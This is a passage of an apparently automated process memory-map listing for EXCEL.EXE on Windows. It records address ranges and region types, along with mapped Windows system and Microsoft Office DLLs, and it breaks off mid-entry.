= 310 start_va = 0x6a70000 end_va = 0x6a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 311 start_va = 0x6a80000 end_va = 0x6a81fff entry_point = 0x6a80000 region_type = mapped_file name = "mssvp.dll.mui" filename = "\\Windows\\System32\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mssvp.dll.mui") Region: id = 312 start_va = 0x6a90000 end_va = 0x6a90fff entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 313 start_va = 0x6aa0000 end_va = 0x6aa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006aa0000" filename = "" Region: id = 314 start_va = 0x6b00000 end_va = 0x6bfffff entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 315 start_va = 0x6c00000 end_va = 0x6cfffff entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 316 start_va = 0x6d00000 end_va = 0x6dfffff entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 317 start_va = 0x6ea0000 end_va = 0x769ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ea0000" filename = "" Region: id = 318 start_va = 0x76a0000 end_va = 0x7e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000076a0000" filename = "" Region: id = 319 start_va = 0x7ea0000 end_va = 0x7f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000007ea0000" filename = "" Region: id = 320 start_va = 0x7fc0000 end_va = 0x7fcffff entry_point = 0x0 region_type = private name = "private_0x0000000007fc0000" filename = "" Region: id = 321 start_va = 0x7fd0000 end_va = 0x83d0fff entry_point = 0x0 region_type = private name = "private_0x0000000007fd0000" filename = "" Region: id = 322 start_va = 0x83e0000 end_va = 0x87e0fff entry_point = 0x0 region_type = private name = "private_0x00000000083e0000" filename = "" Region: id = 323 start_va = 0x87f0000 end_va = 0x8bf0fff entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 324 start_va = 0x8c00000 end_va = 0x952ffff entry_point = 0x8c00000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 325 start_va = 0x9530000 end_va = 0x972ffff entry_point = 0x0 region_type = private name = "private_0x0000000009530000" filename = "" Region: id = 326 start_va = 0x9730000 end_va = 0xa730fff entry_point = 0x0 region_type = private name = "private_0x0000000009730000" filename = "" Region: id = 327 start_va = 0xa740000 end_va = 0xa9d0fff entry_point = 0x0 region_type = private name = "private_0x000000000a740000" filename = "" Region: id = 328 start_va = 0xa9e0000 end_va = 0xaddffff entry_point = 0x0 region_type = private name = "private_0x000000000a9e0000" filename = "" Region: id = 329 start_va = 0xae70000 end_va = 0xaf6ffff entry_point = 0x0 region_type = private name = "private_0x000000000ae70000" filename = "" Region: id = 330 start_va = 0xaf70000 end_va = 0xbf3ffff entry_point = 0x0 region_type = private name = "private_0x000000000af70000" filename = "" Region: id = 331 start_va = 0xbf40000 end_va = 0xc15cfff entry_point = 0xbf40000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 332 start_va = 0xc160000 end_va = 0xc25ffff entry_point = 0x0 region_type = private name = "private_0x000000000c160000" filename = "" Region: id = 333 start_va = 0xc320000 end_va = 0xc32ffff entry_point = 0x0 region_type = private name = "private_0x000000000c320000" filename = "" Region: id = 334 start_va = 0xc330000 end_va = 0xc42ffff entry_point = 0x0 region_type = private name = "private_0x000000000c330000" filename = "" Region: id = 335 start_va = 0xc470000 end_va = 0xc56ffff entry_point = 0x0 region_type = private name = "private_0x000000000c470000" filename = "" Region: id = 336 start_va = 0xc630000 end_va = 0xc6affff entry_point = 0x0 region_type = private name = "private_0x000000000c630000" filename = "" Region: id = 337 start_va = 0xc6e0000 end_va = 0xc7dffff entry_point = 0x0 region_type = private name = "private_0x000000000c6e0000" filename = "" Region: id = 338 start_va = 0xc800000 end_va = 0xc8fffff entry_point = 0x0 region_type = private name = "private_0x000000000c800000" filename = "" Region: id = 339 start_va = 0xc980000 end_va = 0xc9fffff entry_point = 0x0 region_type = private name = "private_0x000000000c980000" filename = "" Region: id = 340 start_va = 0xca10000 end_va = 0xcb0ffff entry_point = 0x0 region_type = private name = "private_0x000000000ca10000" filename = "" Region: id = 341 start_va = 0xcb40000 end_va = 0xcbbffff entry_point = 0x0 region_type = private name = "private_0x000000000cb40000" filename = "" Region: id = 342 start_va = 0xcbf0000 end_va = 0xcceffff entry_point = 0x0 region_type = private name = "private_0x000000000cbf0000" filename = "" Region: id = 343 start_va = 0xccf0000 end_va = 0xce93fff entry_point = 0x0 region_type = private name = "private_0x000000000ccf0000" filename = "" Region: id = 344 start_va = 0xcea0000 end_va = 0xcf9ffff entry_point = 0x0 region_type = private name = "private_0x000000000cea0000" filename = "" Region: id = 345 start_va = 0xd060000 end_va = 0xd15ffff entry_point = 0x0 region_type = private name = "private_0x000000000d060000" filename = "" Region: id = 346 start_va = 0xd160000 end_va = 0xd35ffff entry_point = 0x0 region_type = private name = "private_0x000000000d160000" filename = "" Region: id = 347 start_va = 0xd400000 end_va = 0xd4fffff entry_point = 0x0 region_type = private name = "private_0x000000000d400000" filename = "" Region: id = 348 start_va = 0xd500000 end_va = 0xe855fff entry_point = 0xd500000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 349 start_va = 0xe9c0000 end_va = 0xeabffff entry_point = 0x0 region_type = private name = "private_0x000000000e9c0000" filename = "" Region: id = 350 start_va = 0x37a30000 end_va = 0x37a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000037a30000" filename = "" Region: id = 351 start_va = 0x37c80000 end_va = 0x37c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000037c80000" filename = "" Region: id = 352 start_va = 0x71f10000 end_va = 0x73265fff entry_point = 0x71f10000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 353 start_va = 0x751b0000 end_va = 0x751e2fff entry_point = 0x751b0000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 354 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 355 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 356 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 357 start_va = 0x77e00000 end_va = 0x77e06fff entry_point = 0x77e00000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 358 start_va = 0x77e10000 end_va = 0x77e12fff entry_point = 0x77e10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 359 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 360 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 361 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 362 start_va = 0x13fc60000 end_va = 0x142903fff entry_point = 0x13fc60000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\excel.exe") Region: id = 363 start_va = 0x7febdd50000 end_va = 0x7febdd5ffff entry_point = 0x0 region_type = private name = "private_0x000007febdd50000" filename = "" Region: id = 364 start_va = 0x7febfb90000 end_va = 0x7febfb9ffff entry_point = 0x0 region_type = private name = "private_0x000007febfb90000" filename = "" Region: id = 365 start_va = 0x7fee5c10000 end_va = 0x7fee5e80fff entry_point = 0x7fee5c10000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 366 start_va = 0x7fee5e90000 end_va = 0x7fee5eb1fff entry_point = 0x7fee5e90000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 367 start_va = 0x7fee5ec0000 end_va = 0x7fee5ec9fff entry_point = 0x7fee5ec0000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 368 start_va = 0x7fee5ed0000 end_va = 0x7fee5f42fff entry_point = 0x7fee5ed0000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 369 start_va = 0x7fee5f50000 end_va = 0x7fee6011fff entry_point = 0x7fee5f50000 region_type = mapped_file name = "mssvp.dll" filename = "\\Windows\\System32\\mssvp.dll" (normalized: "c:\\windows\\system32\\mssvp.dll") Region: id = 370 start_va = 0x7fee6020000 end_va = 0x7fee609afff entry_point = 0x7fee6020000 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 371 start_va = 0x7fee6230000 end_va = 0x7fee625afff entry_point = 0x7fee6230000 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\wxpnse.dll") Region: id = 372 start_va = 0x7fee6260000 end_va = 0x7fee627bfff entry_point = 0x7fee6260000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 373 start_va = 0x7fee6280000 end_va = 0x7fee629afff entry_point = 0x7fee6280000 region_type = mapped_file name = "mapi32.dll" filename = "\\Windows\\System32\\mapi32.dll" (normalized: "c:\\windows\\system32\\mapi32.dll") Region: id = 374 start_va = 0x7fee62a0000 end_va = 0x7fee62a9fff entry_point = 0x7fee62a0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 375 start_va = 0x7fee62f0000 end_va = 0x7fee6344fff entry_point = 0x7fee62f0000 region_type = mapped_file name = "msohevi.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEVI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msohevi.dll") Region: id = 376 start_va = 0x7fee63a0000 end_va = 0x7fee63b5fff entry_point = 0x7fee63a0000 region_type = mapped_file name = "msoxev.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSOXEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoxev.dll") Region: id = 377 start_va = 0x7fee66e0000 end_va = 0x7fee6b58fff entry_point = 0x7fee66e0000 region_type = mapped_file name = "gfx.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gfx.dll") Region: id = 378 start_va = 0x7fee6d40000 end_va = 0x7fee6ddffff entry_point = 0x7fee6d40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 379 start_va = 0x7fee6e40000 end_va = 0x7fee6f5efff entry_point = 0x7fee6e40000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 380 start_va = 0x7fee71c0000 end_va = 0x7fee721bfff entry_point = 0x7fee71c0000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msohev.dll") Region: id = 381 start_va = 0x7fee7220000 end_va = 0x7fee7474fff entry_point = 0x7fee7220000 region_type = mapped_file name = "ivy.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\IVY.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ivy.dll") Region: id = 382 start_va = 0x7fee7480000 end_va = 0x7fee8255fff entry_point = 0x7fee7480000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll") Region: id = 383 start_va = 0x7fee84e0000 end_va = 0x7fee9464fff entry_point = 0x7fee84e0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll") Region: id = 384 start_va = 0x7fee9470000 end_va = 0x7fee970afff entry_point = 0x7fee9470000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 385 start_va = 0x7fee9830000 end_va = 0x7fee9949fff entry_point = 0x7fee9830000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ADAL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\adal.dll") Region: id = 386 start_va = 0x7fee9950000 end_va = 0x7fee9acdfff entry_point = 0x7fee9950000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 387 start_va = 0x7fee9ad0000 end_va = 0x7fee9b68fff entry_point = 0x7fee9ad0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 388 start_va = 0x7fee9b70000 end_va = 0x7fee9bdefff entry_point = 0x7fee9b70000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 389 start_va = 0x7fee9be0000 end_va = 0x7feedfc6fff entry_point = 0x7fee9be0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 390 start_va = 0x7feedfd0000 end_va = 0x7feeecc4fff entry_point = 0x7feedfd0000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 391 start_va = 0x7feeecd0000 end_va = 0x7feef10cfff entry_point = 0x7feeecd0000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 392 start_va = 0x7feef110000 end_va = 0x7fef0b3bfff entry_point = 0x7feef110000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 393 start_va = 0x7fef0b40000 end_va = 0x7fef17e6fff entry_point = 0x7fef0b40000 region_type = mapped_file name = "mso98win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll") Region: id = 394 start_va = 0x7fef17f0000 end_va = 0x7fef22befff entry_point = 0x7fef17f0000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 395 start_va = 0x7fef22c0000 end_va = 0x7fef29a3fff entry_point = 0x7fef22c0000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 396 start_va = 0x7fef29b0000 end_va = 0x7fef2e52fff entry_point = 0x7fef29b0000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 397 start_va = 0x7fef3010000 end_va = 0x7fef30e6fff entry_point = 0x7fef3010000 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 398 start_va = 0x7fef3130000 end_va = 0x7fef32ccfff entry_point = 0x7fef3130000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 399 start_va = 0x7fef32d0000 end_va = 0x7fef349ffff entry_point = 0x7fef32d0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 400 start_va = 0x7fef34a0000 end_va = 0x7fef3581fff entry_point = 0x7fef34a0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 401 start_va = 0x7fef3590000 end_va = 0x7fef35cafff entry_point = 0x7fef3590000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 402 start_va = 0x7fef3620000 end_va = 0x7fef36e5fff entry_point = 0x7fef3620000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 403 start_va = 0x7fef36f0000 end_va = 0x7fef377afff entry_point = 0x7fef36f0000 region_type = mapped_file name = "mso50win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll") Region: id = 404 start_va = 0x7fef3ed0000 end_va = 0x7fef3f23fff entry_point = 0x7fef3ed0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 405 start_va = 0x7fef3f30000 end_va = 0x7fef4ae6fff entry_point = 0x7fef3f30000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 406 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 407 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 408 start_va = 0x7fef54d0000 end_va = 0x7fef5540fff entry_point = 0x7fef54d0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 409 start_va = 0x7fef5680000 end_va = 0x7fef5745fff entry_point = 0x7fef5680000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 410 start_va = 0x7fef57f0000 end_va = 0x7fef58acfff entry_point = 0x7fef57f0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 411 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 412 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 413 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 414 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 415 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 416 start_va = 0x7fef82d0000 end_va = 0x7fef830afff entry_point = 0x7fef82d0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 417 start_va = 0x7fef8360000 end_va = 0x7fef8366fff entry_point = 0x7fef8360000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 418 start_va = 0x7fef8370000 end_va = 0x7fef8559fff entry_point = 0x7fef8370000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 419 start_va = 0x7fef8560000 end_va = 0x7fef8799fff entry_point = 0x7fef8560000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 420 start_va = 0x7fef87a0000 end_va = 0x7fef893bfff entry_point = 0x7fef87a0000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 421 start_va = 0x7fef8970000 end_va = 0x7fef89eefff entry_point = 0x7fef8970000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 422 start_va = 0x7fef89f0000 end_va = 0x7fef8a2afff entry_point = 0x7fef89f0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 423 start_va = 0x7fef8a90000 end_va = 0x7fef8aa8fff entry_point = 0x7fef8a90000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 424 start_va = 0x7fef8ab0000 end_va = 0x7fef8ac4fff entry_point = 0x7fef8ab0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 425 start_va = 0x7fef8e40000 end_va = 0x7fef8e4bfff entry_point = 0x7fef8e40000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 426 start_va = 0x7fef8e50000 end_va = 0x7fef8e83fff entry_point = 0x7fef8e50000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 427 start_va = 0x7fef8f60000 end_va = 0x7fef904dfff entry_point = 0x7fef8f60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 428 start_va = 0x7fef9310000 end_va = 0x7fef9320fff entry_point = 0x7fef9310000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 429 start_va = 0x7fef9330000 end_va = 0x7fef934efff entry_point = 0x7fef9330000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 430 start_va = 0x7fef93b0000 end_va = 0x7fef93b8fff entry_point = 0x7fef93b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 431 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 432 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 433 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 434 start_va = 0x7fef9810000 end_va = 0x7fef98b6fff entry_point = 0x7fef9810000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 435 start_va = 0x7fef98c0000 end_va = 0x7fef9914fff entry_point = 0x7fef98c0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 436 start_va = 0x7fef9920000 end_va = 0x7fef9953fff entry_point = 0x7fef9920000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: 